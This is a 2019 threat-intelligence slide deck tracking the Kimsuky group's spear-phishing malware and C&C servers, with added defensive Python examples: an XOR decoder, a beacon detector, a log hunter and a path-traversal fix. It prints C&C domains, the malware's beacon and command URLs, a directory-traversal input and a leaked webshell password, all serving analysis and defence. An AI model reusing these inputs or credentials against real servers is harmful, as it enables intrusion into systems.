## Kimsuky Group : Track the King of the Spear-Phishing

###### 2019.10.04 Jaeki Kim, Kyoung-Ju Kwak, Min-Chang Jang

##### Speakers

###### Jaeki Kim (a.k.a JACK2)
- Malware & Threat Analysis: Computer Emergency Analysis Team @FSI (2016~)
- Main Author of Threat Intelligence Report 'Campaign DOKKAEBI'
- Speaker of "DOKKAEBI: Documents of Korean and Evil Binary" @VB2018
- Digital Forensic: CECRC @NEC (National Election Commission) (2016)
- M.S. degree - Information Security: SANE Lab, Korea University (2014 ~ 2016)
- Interest in Analysis: Mentor of Best of the Best (B.O.B) Program (Vulnerability Analysis Track) @KITRI
- Member of "KOREANBADASS", "SeoulPlusBadass" Team @DEFCON CTF Finalist (2017, 2018, 2019)
- SNS (facebook, twitter): @2runjack2

###### Kyoung-ju Kwak
- Manager of FSI Threat Analysis Team (~Jan. 2019)
- Manager of FSI Security Operations Center (Current)
- Adjunct Professor, Department of Forensics, @SungKyunKwan University
- Main Author of Threat Intelligence Report "Campaign Rifle : Andariel, The Maiden of Anguish"
- Member of National Police Agency Cybercrime Advisory Committee
- Speaker of {Blackhat, Kaspersky SAS, Kaspersky CSW, PACSEC, HITCON, HACKCON, ISCR, etc}
- SNS (facebook, twitter): @kjkwak12

###### Min-Chang Jang (a.k.a OSIRIS)
- A manager of CEAT (Computer Emergency Analysis Team) @FSI (2014~)
- Main Author of Threat Intelligence Report 'Shadow Voice'
- A graduate student (M.S. degree), SANE Lab, Korea University (2014 ~ Now)
- Served in the Korea NAVY CERT
- Interest in Extreme Sports
- Speaker of {BlackHat Europe & Asia, KIMCHI CON, CODE BLUE}
- SNS (fb: mins4416, twt: 051R15)

###### Threat Intelligence Reports (FSI)
- http://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataList.do
- ANDARIEL (2017.07), DOKKAEBI (2018.08), ShadowVoice (2018.12)

#### Agenda
1. Introduction
2. Related Cases
3. Toolset characteristics
4. Tracking Malware & Monitoring C&C
5. Relationships
6. Recent Trends
7. Conclusion

#### 1. Introduction

##### DOKKAEBI: Documents of Korean and Evil Binary (VB2018, 2018.10.03, Jaeki Kim, Kyoung-Ju Kwak, Min-Chang Jang)
- Campaign DOKKAEBI: a set of operations carried out by threat groups using malicious Hangul documents for some particular purpose
- Hangul documents and the malware they drop (or download) => Documents Of Korean (and) Evil Binary
- Related Threat Groups: Bluenoroff, Kimsuky, Scarcruft

##### Related Threat Groups

| Threat Group | Target | Purpose | Activity Time | Major Incident |
|---|---|---|---|---|
| Bluenoroff | Global and Korean domestic financial companies; officials and users of crypto-currency exchanges | Confidential information takeover and monetary gain (SWIFT, crypto-currency) | 2015 ~ | SWIFT illegal transaction of central bank of Bangladesh |
| Kimsuky | Infrastructure, Government, North Korean defectors and politicians | Information gathering and social confusion | 2013 ~ | KHNP cyber terrorism (2014) |
| Scarcruft | Diplomatic and North Korean Human Rights Organizations and People | Information gathering and information destruction purposes | 2016 ~ | Attack using Flash Zero Day (CVE-2016-4171, CVE-2018-4878) |

This talk focuses on the Kimsuky row.

##### Kimsuky Group
- "The Kimsuky Operation: A North Korean APT?" (Kaspersky, 2013.09)
- KHNP (Korea Hydro & Nuclear Power) cyber terrorism attacks (2014.12)
- Still active as of 2019

#### 2. Related Cases

##### 2019.01. ~
- Known under various operation names: Cobra Venom, Kitty Phishing, Kabar Cobra …
- Reference: https://blog.alyac.co.kr/2066

#### 3. Toolset characteristics

##### Server-side Toolkits (for Spear-Phishing)
- 1) Mailer - shape
- 2) Mailer - core
- 3) Beaconer
- 4) Phisher
- 5) Logger

##### Malware
- 6) Dropper - Malicious HWP Documents
- 7) Dropper - Camouflaged HWP Documents
- 8) Script
- 9) Info Stealer

##### Toolsets (summary)

| Name | No. | Type (Tag) | Contents |
|---|---|---|---|
| Mailer (shape) | 1 | Mailer | Mailer (just shape) |
| Mailer (core) | 2 | Mailer | Mailer (actual function): 1) attachment malware, 2) link to phishing page for account takeover |
| Beaconer | 3 | Web-Beacon | Beacon to check whether mail is being viewed |
| Phisher | 4 | Account Stealer, Phishing | Phishing Toolkit (lod): phishing page for account steal |
| Logger | 5 | Logging, Phishing | Logging for phishing target information |
| Malicious HWP | 6 | Dropper, Spear-Phishing | Malicious HWP documents |
| Camouflaged HWP | 7 | Dropper, Spear-Phishing | Camouflaged HWP documents (ex. sfx, exe ...) |
| Script | 8 | Downloader, Logging | Download additional malware and logging (ex. *.vbs, *.wsf, *.jse, *.ps1) |
| Info Stealer | 9 |  | Steal information of infected target (C&C / DLL / FTP) |

#### 4. Tracking Malware & Monitoring C&C

##### Focus
- Attacker != Defender : OPSEC FAIL

##### OPSEC FAIL CASES
- 1) Directory Listing
- 2) Leaked FTP Access Information
- 3) File Download vulnerability

##### [CASE 1-1] Directory Listing - HWP Malware
- After "Campaign DOKKAEBI" (H-DS type)
##### [CASE 1-1] Directory Listing - HWP Malware
- Process Hollowing : notepad.exe
- core.dll (4de21c3af64b3b605446278de92dfff4)
  - DLL Name : OneDll.dll
  - Export Function Name : DllRegisterServer
- fontchk.jse (f22db1e3ea74af791e34ad5aa0297664)
  - C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)

##### Like Sherlock Holmes …
- fontchk.jse (f22db1e3ea74af791e34ad5aa0297664) → C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)

##### C&C - Tracking/Monitoring
- 18.07.10. (D+49): fontchk.jse (f22db1e3ea74af791e34ad5aa0297664), C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)
- 18.07.13. (D+52): a new file on the same C&C
  - zerobase (53ac231e8091abcd0978124f9268b4e4), XOR : 0x09FD8477
  - zerobase_xor_09FD8477 (MD5: 8b59ea1ee28e0123da82801abc0cce4d)
    - DLL Name : HanyangUpload_script.dll
    - Build Time : 2018.07.12. 08:25:45
- HanyangUpload_script.dll - GetName
  - 1) Get Computer Information (Mac Address, Volume)
  - 2) Scan Specific Files
  - 3) C&C : www.military[.]co.kr (211.202.2[.]51, KR)
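The "zerobase" file above is a DLL XOR-encoded with the DWORD key 0x09FD8477; the deck gives the key but not how it is applied. The following is an added example, not code from the deck or from the Kimsuky toolset: it assumes the DWORD is applied as its four little-endian bytes repeated over the file, and goes one step beyond the slide by recovering the key from the DOS header a decoded DLL is expected to start with (the known-plaintext trick an analyst reaches for when only the blob is at hand). The sample "PE" is a constructed stub, and the function names are mine.

```python
"""Decode a DWORD-XOR-encoded staged payload and recover the key from the PE header.

Added example, not code from the deck. Assumptions: the 4-byte key is applied
little-endian and repeating; the decoded image starts with the usual DOS
header bytes 'MZ\x90\x00'. The sample binary below is a constructed stub.
"""
import struct
from typing import Optional, Tuple

KEY_LEN = 4
DOS_HEADER_PREFIX = b"MZ\x90\x00"   # assumption: typical linker output


def key_to_bytes(key: int) -> bytes:
    """Lay the DWORD key out as four little-endian bytes (assumption)."""
    return struct.pack("<I", key)


def xor_with_dword(data: bytes, key: int) -> bytes:
    """XOR every byte with the repeating key; encoding and decoding are the same op."""
    kb = key_to_bytes(key)
    return bytes(b ^ kb[i % KEY_LEN] for i, b in enumerate(data))


def recover_dword_key(blob: bytes, known_prefix: bytes = DOS_HEADER_PREFIX) -> int:
    """Known-plaintext recovery: blob[:4] XOR expected header bytes == key bytes."""
    if len(blob) < KEY_LEN or len(known_prefix) != KEY_LEN:
        raise ValueError("need at least 4 bytes of blob and a 4-byte known prefix")
    kb = bytes(b ^ p for b, p in zip(blob[:KEY_LEN], known_prefix))
    return struct.unpack("<I", kb)[0]


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on decoded output: 'MZ' magic and e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_sample_pe_stub() -> bytes:
    """Constructed sample (not a real binary): DOS header + PE signature in 0x80 bytes."""
    stub = bytearray(0x80)
    stub[0:4] = DOS_HEADER_PREFIX
    struct.pack_into("<I", stub, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    stub[0x40:0x44] = b"PE\x00\x00"
    return bytes(stub)


def decode_staged_file(blob: bytes, key: Optional[int] = None) -> Tuple[int, bytes]:
    """Decode a staged blob; when no key is given, recover it from the header first."""
    if key is None:
        key = recover_dword_key(blob)
    plain = xor_with_dword(blob, key)
    if not looks_like_pe(plain):
        raise ValueError(f"key 0x{key:08X} does not yield a PE image")
    return key, plain


if __name__ == "__main__":
    encoded = xor_with_dword(build_sample_pe_stub(), 0x09FD8477)
    recovered, decoded = decode_staged_file(encoded)
    print(f"recovered key 0x{recovered:08X}, PE header valid: {looks_like_pe(decoded)}")
```

If the blob's first bytes are not a DOS header (for example, the file is wrapped or has a prepended stub) the recovery yields a wrong key and `looks_like_pe` rejects it, which is the signal to try another known prefix rather than trust the output.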
##### [CASE 1-2] Camouflaged as HWP documents
- SFX (self-extracting archive) camouflaged as an HWP document
- Flow
- PowerShell - Set Registry
  - Path: \Windows\CurrentVersion\Screensavers
  - Name: ScreenRibbonsDomain
  - Value: primary-help.esy.es
- PowerShell - Download malware and Execute (step 5 of the flow; the same registry path, name and value appear again)
- Return! (2019.04.01.)
  - Directory Listing → Mailer +_+
  - Mailer - shape & core
- Self-Testing using My Email => Sending normally
- Check Email
  - Attachment from Daum : 시사회.zip (시사회.vbs) (시사회 = "preview screening")
  - Web Beacon : hxxp://[C&C]/_log/reading.php?uid=[E-mail]

##### OPSEC FAIL CASES (so far)
- 1) Directory Listing : Detect New Malware & Mailer
- 2) Leaked FTP Access Information
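The Beaconer (toolset no. 3) shows up in the self-test mail as a remote image whose URL carries the recipient's address, `reading.php?uid=[E-mail]`. That shape is something a mail gateway or a triage script can flag on its own. The following is an added example, not code from the deck or from the Kimsuky toolset: it parses an HTML mail body, keeps only remotely fetched images, and reports those whose query string carries an e-mail address or that are sized 1x1. The host names and the sample mail body are constructed.

```python
"""Flag web beacons in an HTML mail body.

Added example (not code from the deck or the Kimsuky toolset). Finds remote
<img> elements whose URL carries the recipient's address, the shape of the
hxxp://[C&C]/_log/reading.php?uid=[E-mail] beacon. Sample data is constructed.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class _ImgCollector(HTMLParser):
    """Collect the attribute dict of every <img> tag in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.images: List[Dict[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "img":
            self.images.append({k: (v or "") for k, v in attrs})


def extract_images(html: str) -> List[Dict[str, str]]:
    parser = _ImgCollector()
    parser.feed(html)
    parser.close()
    return parser.images


def classify_image(img: Dict[str, str], recipient: str) -> Optional[Dict[str, str]]:
    """Return a finding for a beacon-like image, or None for an ordinary one."""
    src = img.get("src", "")
    parts = urlsplit(src)
    # cid:/data: images travel inside the mail; only a remote fetch can report an open
    if parts.scheme not in ("http", "https"):
        return None
    reasons: List[str] = []
    for key, values in parse_qs(parts.query).items():      # parse_qs already unquotes
        for value in values:
            if value.lower() == recipient.lower() or EMAIL_RE.fullmatch(value):
                reasons.append(f"query parameter '{key}' carries an e-mail address")
    if not reasons and recipient.lower() in unquote(src).lower():
        reasons.append("recipient address embedded in the URL path")
    width, height = img.get("width", ""), img.get("height", "")
    if width in ("0", "1") and height in ("0", "1"):
        reasons.append("invisible 1x1 / 0x0 image")
    if not reasons:
        return None
    return {"url": src, "host": parts.hostname or "", "reasons": "; ".join(reasons)}


def find_beacons(html: str, recipient: str) -> List[Dict[str, str]]:
    """Scan a mail body and return every beacon-like remote image."""
    findings = []
    for img in extract_images(html):
        finding = classify_image(img, recipient)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample: an embedded logo, a beacon, and an ordinary remote banner.
SAMPLE_MAIL = """<html><body>
<p>Please find the attached preview materials.</p>
<img src="cid:logo@mail" width="120" height="40">
<img src="http://c2.example.invalid/_log/reading.php?uid=analyst%40example.invalid" width="1" height="1">
<img src="https://www.example.invalid/banner.png" width="600" height="80">
</body></html>"""

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_MAIL, "analyst@example.invalid"):
        print(hit["host"], "->", hit["reasons"])
```

The recipient-address check is the strong signal; the 1x1 size check on its own also catches legitimate marketing pixels, so in a gateway rule it is better used to raise severity than to block by itself.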
##### [CASE 2] Leaked FTP Access Information
- Malicious Script (Delivered-Email.wsf)
  - 1) Additional Malware download from C&C
  - 2) Open Email (Normal file)
  - 3) Execute Malware (Info Stealer)
  - 4) FTP Upload
- C&C : FTP Upload
  - Free Hosting Service (Hostinger)
  - Compromised website in South Korea
  - Love victory & rhdwn (공주 -> princess; "rhdwn" is 공주 typed in the Korean keyboard layout)
- OPSEC FAIL! The FTP access information is embedded in step 4) FTP Upload
- Free Hosting Service (Hostinger): Love victory -> Webshell Password

##### OPSEC FAIL CASES (so far)
- 1) Directory Listing : Detect New Malware & Mailer
- 2) Leaked FTP Access Information : Get Server-side toolkit
- 3) File Download vulnerability
##### [CASE 3] File Download vulnerability
- EML - HWP Attachment
  - Distribution Server : member-authorize[.]com
- 1) HWP : EPS (Encapsulated PostScript), Summary Information (X)
- 2) PowerShell : Get Malicious Script from ddlove[.]kr
- 3) 1.wsf
  - (a) Set var
  - (b) Check Extract Util - WinRAR / ALZip
  - (c) Check Response
  - (d) Save File & Extract
  - (e) or Save File & Decoding
  - (f) Execute file
- 4) Freedom.dll
  - Timestamp : Tue Jan 08 09:02:00 2019
  - Export : GrapHouse
  - Check Env (32/64); 64bit : /bbs/data/font/exts.fmt
  - Process Hollowing (explorer.exe)
  - [SND]: /register.php?WORD=com_XXXXXXXX&NOTE=
  - [GET]: /bbs/data/ariaK[T]_XXXXXXXX
  - [DEL]: /join.php?file=
- Distribution Server : member-authorize[.]com
- Directory Listing (OPSEC FAIL - CASE #01)
  - /security/downloads
  - /security/downloads/download.php
- Like Sherlock Holmes … again: fontchk.jse (f22db1e3ea74af791e34ad5aa0297664) → C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)
- Try to file download : /security/downloads/download.php?fileName=dowonload.php
- Directory Listing + File download : ../../../../../../../home/u385698457/public_html/
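The three request shapes the deck lists for Freedom.dll ([SND] register, [GET] fetch, [DEL] delete, plus the 64-bit stage path) are concrete enough to hunt for in proxy logs. The following is an added example, not code from the deck or from the malware: it turns those shapes into regular expressions, runs them over constructed proxy log lines, and groups the hits per client and host so that a full check-in cycle stands out. The host `cdn.example.invalid`, the token values and the log format are constructed; reading the deck's `XXXXXXXX` as an 8-character alphanumeric token and `ariaK[T]` as "aria" followed by K or T are my assumptions.

```python
"""Hunt for the Freedom.dll request shapes in proxy logs.

Added example (not code from the deck or the malware). The URL shapes come
from the deck; the token width, the K/T reading of 'ariaK[T]', the log
format and all hosts/tokens below are constructed assumptions.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

TOKEN = r"[0-9A-Za-z]{8}"   # assumption: XXXXXXXX is an 8-character alphanumeric per-host token

FREEDOM_PATTERNS = {
    "SND": re.compile(r"/register\.php\?WORD=com_" + TOKEN + r"&NOTE="),
    "GET": re.compile(r"/bbs/data/aria[KT]_" + TOKEN + r"(?![0-9A-Za-z])"),
    "DEL": re.compile(r"/join\.php\?file="),
    "STAGE64": re.compile(r"/bbs/data/font/exts\.fmt(?![0-9A-Za-z.])"),   # 64-bit stage path
}

# Constructed log format: timestamp, client, method, URL, status (one request per line)
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})\s*$"
)


def classify_url(url: str) -> Optional[str]:
    """Return the deck's tag for a URL matching one of the request shapes, else None."""
    for tag, pattern in FREEDOM_PATTERNS.items():
        if pattern.search(url):
            return tag
    return None


def parse_line(line: str) -> Optional[Dict[str, str]]:
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one hit per log line whose URL matches a Freedom.dll shape."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        tag = classify_url(rec["url"])
        if tag:
            hits.append({"ts": rec["ts"], "src": rec["src"],
                         "host": urlsplit(rec["url"]).hostname or "",
                         "tag": tag, "url": rec["url"]})
    return hits


def summarize(hits: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Per 'client -> host': the distinct tags seen, in first-seen order."""
    out: Dict[str, List[str]] = {}
    for hit in hits:
        key = f"{hit['src']} -> {hit['host']}"
        tags = out.setdefault(key, [])
        if hit["tag"] not in tags:
            tags.append(hit["tag"])
    return out


# Constructed sample log: one infected client and one clean client.
SAMPLE_LOG = """\
2019-01-10T09:15:02Z 10.0.0.5 GET http://cdn.example.invalid/bbs/data/font/exts.fmt 200
2019-01-10T09:15:03Z 10.0.0.5 GET http://cdn.example.invalid/register.php?WORD=com_A1B2C3D4&NOTE= 200
2019-01-10T09:20:03Z 10.0.0.5 GET http://cdn.example.invalid/bbs/data/ariaK_A1B2C3D4 404
2019-01-10T09:20:05Z 10.0.0.5 GET http://cdn.example.invalid/join.php?file=ariaK_A1B2C3D4 200
2019-01-10T09:21:00Z 10.0.0.7 GET http://www.example.invalid/index.php 200
2019-01-10T09:22:00Z 10.0.0.7 GET http://www.example.invalid/bbs/data/photo_12345678.jpg 200
"""

if __name__ == "__main__":
    for key, tags in summarize(scan_log(SAMPLE_LOG)).items():
        print(key, tags)
```

A client that shows SND followed by GET and DEL against the same host has completed a register / fetch / clean-up cycle; a lone SND is still worth a look, since the GET in the sample returns 404 when the operator has not yet staged a task.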
##### [CASE 3] File Download vulnerability - Directory Listing + File download
- ../../../../../../../home/u385698457/public_html/
- github.com/ostoc/http2_php/miniProxy.php
- /security/mailer
  - 1) mail.php
  - 2) mail_ok.php - attachFileName
  - 2) mail_ok.php - Phishing (Previous)
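The mailer's `download.php?fileName=` is a textbook unrestricted file download: the parameter is joined onto the downloads directory with no containment check, so `../` sequences walk up to `public_html` and `?fileName=dowonload.php` hands back the handler's own source. The following is an added example, not code from the deck or from the PHP handler: the unchecked join is shown beside a hardened resolver in Python. The base directory `/home/u385698457/public_html/security/downloads` is a constructed approximation of the layout the deck shows, and the refusal to serve `.php` files is a design choice of the example.

```python
"""Unrestricted file download: the unchecked join beside a hardened resolver.

Added example (not the deck's or the handler's code). The base directory
is a constructed approximation of the layout in the deck; posixpath is used
so the behaviour is the same on any host.
"""
import posixpath
import re

# Allow-list: a name must start with a letter/digit and contain no separators,
# so '..' and 'a/b' are rejected by construction rather than by a deny-list.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")
# Design choice for the example: never serve server-side code through the handler.
DENIED_SUFFIXES = (".php", ".phtml", ".php5")


def unchecked_path(base_dir: str, file_name: str) -> str:
    """Vulnerable pattern (mirrors the flaw, not a fix): join and normalize with
    no containment check, so '../' walks out of base_dir."""
    return posixpath.normpath(posixpath.join(base_dir, file_name))


def escapes_base(base_dir: str, path: str) -> bool:
    """True when a normalized path lies outside base_dir."""
    base = posixpath.normpath(base_dir)
    return not (path == base or path.startswith(base + "/"))


def safe_path(base_dir: str, file_name: str) -> str:
    """Hardened resolver: allow-list the name, deny script sources, then verify
    the normalized result sits directly under base_dir before returning it."""
    base = posixpath.normpath(base_dir)
    if not SAFE_NAME_RE.fullmatch(file_name):
        raise ValueError("rejected file name")
    if file_name.lower().endswith(DENIED_SUFFIXES):
        raise ValueError("refusing to serve script source")
    full = posixpath.normpath(posixpath.join(base, file_name))
    # Belt and braces: the regex already forbids separators, but the containment
    # check is what keeps a future relaxation of the regex from re-opening the hole.
    if posixpath.dirname(full) != base or posixpath.basename(full) != file_name:
        raise ValueError("path escapes download directory")
    return full


# Constructed approximation of the deck's layout (account home -> public_html).
DOWNLOAD_DIR = "/home/u385698457/public_html/security/downloads"

if __name__ == "__main__":
    traversal = "../../../../../../../home/u385698457/public_html/index.php"
    print("unchecked:", unchecked_path(DOWNLOAD_DIR, traversal))
    for name in ("report.hwp", traversal, "dowonload.php"):
        try:
            print("safe:", safe_path(DOWNLOAD_DIR, name))
        except ValueError as exc:
            print("safe: rejected", repr(name), "->", exc)
```

The allow-list does the real work; the final containment check is cheap insurance, and the `.php` refusal closes the specific trick the deck shows of fetching the handler's own source.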
#### 5. Relationships

##### Like Sherlock Holmes …
- fontchk.jse (f22db1e3ea74af791e34ad5aa0297664) → C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL) (from [CASE 1-1] Directory Listing - HWP Malware)

##### Between Toolsets and C&C server
- Compromised website in South Korea
- Cooperation with the police and investigation agency
- Respond about C&C server
- Starting point: fontchk.jse (f22db1e3ea74af791e34ad5aa0297664), C&C : suppcrt-seourity[.]esy.es (185.224.138[.]29, NL)
- Some of the results of analyzing:
  gyjmc[.]com (KR) → member-authorize[.]com (HOSTINGER) → ddlovke[.]kr (KR) → military[.]co.kr (KR) ← suppcrt-seourity[.]esy.es (HOSTINGER)
- Full ver. : http://bit.ly/VB2019_Kimsuky_ M lt

#### 6. Recent Trends

##### [CASE 3] File Download vulnerability - Directory Listing (OPSEC FAIL - CASE #01)
- /security/downloads
- Directory Listing : New Malware
  - F:\PC_Manager\Utopia_v0.1\bin\AppleSeed.pdb

##### [CASE 1-1] Directory Listing - HWP Malware
- HanyangUpload_script.dll - GetName (2018.07.13)
  - 3) C&C : www.military[.]co.kr (211.202.2[.]51, KR)
- Another Logs (2019.07.) => NUCLEAR
  - 3) C&C : www.military[.]co.kr (211.202.2[.]51, KR)

##### Related Threat Groups (recap)

| Threat Group | Target | Purpose | Activity Time | Major Incident |
|---|---|---|---|---|
| Kimsuky | Infrastructure, Government, North Korean defectors and politicians | Information gathering and social confusion | 2013 ~ | KHNP cyber terrorism (2014) |

#### 7. Conclusion

##### Incident Response in advance
- Geopolitical location in South Korea
- Tracking & Monitoring + @
- REMEMBER - various information was obtained through OPSEC FAIL cases like these
- Share Information
- Cooperate with Relevant agency for Response

##### Q & A

### Thank you :)

###### Special Thanks: Seongsu Park (@unpacker) @GReAT, amur84 @National Police Agency, hypen1117

E-mail : jack2@fsec.or.kr, Twitter @2runjack2